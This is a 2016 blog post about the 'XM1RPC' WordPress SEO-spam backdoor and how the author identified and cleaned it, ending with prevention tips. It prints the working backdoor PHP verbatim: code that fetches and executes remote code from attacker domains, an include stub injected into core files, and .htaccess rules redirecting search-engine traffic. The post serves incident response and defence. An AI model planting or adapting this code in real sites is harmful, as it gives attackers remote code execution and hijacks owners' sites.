Xm1rpc Backdoor WordPress SEO spam hack 2016

11 November 2016
main image

Xm1rpc Backdoor WordPress SEO spam hack 2016

I’ve recently come across an issue with some of our monitored WordPress websites in which some sort of malicious code and files have appeared into the root directory of our WordPress websites. the hack is called the XM1RPC campaign which is a SEO spam distribution backdoor hack.

The hack is identified by the following:

The default WordPress xmlrpc.php file is replaced with xm1rpc.php which will contain code looking similar to

$query = isset($_SERVER['QUERY_STRING'])? $_SERVER['QUERY_STRING']: ''; if (false !== strpos($query, 'simpler-ws')) { __1get_ws(); $ws_hash = md5('wsa'); $cache_dir = __1get_root(); $ws_file = $cache_dir.'/'.$ws_hash.'.zip'; require($ws_file); die(''); } function __1get_root() { $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); return $root_path; } function __1get_ws() { $host = isset($_SERVER['HTTP_HOST'])? $_SERVER['HTTP_HOST']: ''; $ws_hash = md5('wsa'); $cache_dir = __1get_root(); $ws_file = $cache_dir.'/'.$ws_hash.'.zip'; if (!file_exists($ws_file) || file_exists($ws_file) && (time() - filemtime($ws_file) > 60*60*24*1)) { $ws = __1fetch_url(__get_rev().'&get_ws'); if (!empty($ws)) file_put_contents($ws_file, $ws); } else { $ws = file_get_contents($ws_file); } return $ws; } function __get_rev() { return 'http://bokoinchina.com/extadult2.php?host='.trim(strtolower($_SERVER['HTTP_HOST']), '.').'&full_url='.urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); return 'http://nezlobudnya.com/generate'; } function __1fetch_url($url) { $contents = false; $errs = 0; while ( !$contents && ($errs++ < 3) ) { $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'; if (is_callable('curl_init')) { $c = curl_init($url); curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); curl_setopt($c, CURLOPT_USERAGENT,$user_agent); $contents = curl_exec($c); if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false; curl_close($c); } else { $allowUrlFopen = preg_match('/1|yes|on|true/i', ini_get('allow_url_fopen')); if ($allowUrlFopen) { $options = array('http' => array('user_agent' => $user_agent)); $context = stream_context_create($options); $contents = @file_get_contents($url, false, $context); } } } return $contents; }

The xm1rpc file acts similar to a backdoor. The attacker fetches code from malicious domains such as bokoinchina[.]com and nezlobudnya[.]com.

The following files are injected with the following / similar code.

  • Wp-include/index.php
  • Wp-admin/index.php
  • Wp-admin/load.php
  • Index.php
                                                                                                                                                                  
error_reporting(0);ini_set("display_errors",0);$localpath=getenv("SCRIPT_NAME");
$absolutepath=getenv("SCRIPT_FILENAME");
$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));
include_once($root_path."/d730d81e7e1033a51c2bddc5c68874ce.zip");

Inside the htaccess files the following rewrite statements have been added or similar.


RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^.*$ index.php [L]


RewriteEngine On
RewriteRule ^file\/[a-zA-Z0-9]+\/[0-9]+\/$ file.php [L]


RewriteEngine On
RewriteRule ^([a-zA-Z0-9]+)-(.*)-([0-9]+)\.sql$ file.php?$1=$2-$3 [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]


RewriteEngine On
RewriteRule ^kgc\/[a-zA-Z0-9]+\/[0-9]+\/$ kgc.php [L]


RewriteEngine On
RewriteRule ^([a-zA-Z0-9]+)-(.*)-([0-9]+)\.sql$ file.php?$1=$2-$3 [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]


RewriteEngine On

A bunch of encrypted .zip files have been uploaded to root directories and wp-include. It will appear that these files are .zip but in reality, they are they execute PHP code.

In my case malicious code was added to /wp-includes/load.php, which is a WordPress core file. The injected code is able to create the xm1rpc.php file which reinfects the .htaccess:

How to prevent XM1RPC.php infection.

  • Try adding a fresh install of wp-include to your website.
  • Remove malicious code from all infected files mentioned above.
  • Change passwords for any accounts on your WordPress site, use strong passwords
  • Avoid hosting several websites under the same shared account because it can lead to cross contamination and infect multiple websites on the same server
  • Update WordPress / CMS to latest versions and update all plugins.
  • Install a firewall on your website
  • Check your core file integrity using plugins such as word fence


Article by: Brett
Category : Stories